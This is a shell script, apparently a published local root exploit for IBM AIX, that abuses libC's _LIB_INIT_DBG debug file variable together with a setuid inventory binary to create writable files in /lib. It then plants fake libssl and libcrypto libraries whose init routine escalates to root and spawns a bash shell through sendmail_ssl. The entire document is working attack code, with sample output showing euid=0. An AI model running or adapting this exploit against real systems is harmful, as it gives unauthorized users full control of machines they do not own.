#!/bin/sh # IBM AIX libC _LIB_INIT_DBG Arbitrary File Creation Exploit # Karol Wiesek # # $ exploit.sh # ar: Creating an archive file libssl.a. # a - libssl.so.0 # ar: Creating an archive file libcrypto.a. # a - libcrypto.so.0 # uid=203 euid=0 # bash-3.00# uname -a # AIX aix53 3 5 0008A232D700 # bash-3.00# which sendmail_ssl 2>&1 >/dev/null if [ $? -gt 0 ]; then echo "ERR: no sendmail_ssl binary" exit fi if [ -f /lib/libssl.a ]; then echo "ERR: /lib/libssl.a exists" exit fi if [ -f /lib/libcrypto.a ]; then echo "ERR: /lib/libcrypto.a exists" exit fi cat << _EOF > libssl.c #include #include void init(void) { printf("uid=%i euid=%i\n", getuid(), geteuid()); setuid(geteuid()); unlink("/lib/libssl.a"); unlink("/lib/libcrypto.a"); execl("/usr/bin/bash","bash",0); } void SSL_CTX_ctrl(void) { } void SSL_CTX_load_verify_locations(void) { } void SSL_CTX_new(void) { } void SSL_CTX_set_cert_verify_callback(void) { } void SSL_CTX_set_client_CA_list(void) { } void SSL_CTX_set_tmp_rsa_callback(void) { } void SSL_CTX_set_verify(void) { } void SSL_accept(void) { } void SSL_clear(void) { } void SSL_connect(void) { } void SSL_free(void) { } void SSL_get_error(void) { } void SSL_get_peer_certificate(void) { } void SSL_library_init(void) { } void SSL_load_client_CA_file(void) { } void SSL_load_error_strings(void) { } void SSL_new(void) { } void SSL_pending(void) { } void SSL_read(void) { } void SSL_set_accept_state(void) { } void SSL_set_connect_state(void) { } void SSL_set_rfd(void) { } void SSL_set_wfd(void) { } void SSL_shutdown(void) { } void SSL_write(void) { } void SSLv23_server_method(void) { } void SSLv23_client_method(void) { } void SSL_get_ex_data_X509_STORE_CTX_idx(void) { } void SSL_set_verify(void) { } void SSL_state_string_long(void) { } void SSL_alert_type_string_long(void) { } void SSL_alert_desc_string_long(void) { } void SSL_get_current_cipher(void) { } void SSL_CIPHER_get_name(void) { } void SSL_CIPHER_get_bits(void) { } void SSL_CIPHER_get_version(void) { } void SSL_get_verify_result(void) { } void SSL_CTX_use_PrivateKey_file(void) { } void SSL_CTX_use_certificate_file(void) { } void SSL_CTX_check_private_key(void) { } _EOF cat << _EOF > libcrypto.c void DH_size(void) { } void ERR_error_string(void) { } void ERR_get_error(void) { } void RAND_seed(void) { } void RSA_generate_key(void) { } void X509_NAME_oneline(void) { } void X509_STORE_CTX_get_current_cert(void) { } void X509_STORE_CTX_get_error(void) { } void X509_get_subject_name(void) { } void X509_verify_cert_error_string(void) { } void X509_STORE_CTX_get_error_depth(void) { } void X509_STORE_CTX_get_ex_data(void) { } void X509_verify_cert(void) { } void RSA_free(void) { } void ERR_get_error_line_data(void) { } void X509_get_issuer_name(void) { } void X509_NAME_get_text_by_NID(void) { } void EVP_md5(void) { } void X509_digest(void) { } void X509_free(void) { } void DSA_generate_parameters(void) { } void DSA_dup_DH(void) { } void DSA_free(void) { } void CRYPTO_thread_id(void) { } void DH_new(void) { } void BN_bin2bn(void) { } void BIO_new_fp(void) { } void BIO_new_file(void) { } void PEM_read_bio_DHparams(void) { } void BIO_free(void) { } void DH_free(void) { } _EOF gcc -Xlinker -binitfini:init -shared -o libssl.so.0 libssl.c ar -rv libssl.a libssl.so.0 gcc -shared -o libcrypto.so.0 libcrypto.c ar -rv libcrypto.a libcrypto.so.0 umask 0 _LIB_INIT_DBG=1 _LIB_INIT_DBG_FILE=/lib/libssl.a /opt/IBMinvscout/bin/invscoutClient_VPD_Survey 2>&1 > /dev/null _LIB_INIT_DBG=1 _LIB_INIT_DBG_FILE=/lib/libcrypto.a /opt/IBMinvscout/bin/invscoutClient_VPD_Survey 2>&1 > /dev/null cat libssl.a > /lib/libssl.a cat libcrypto.a > /lib/libcrypto.a `which sendmail_ssl`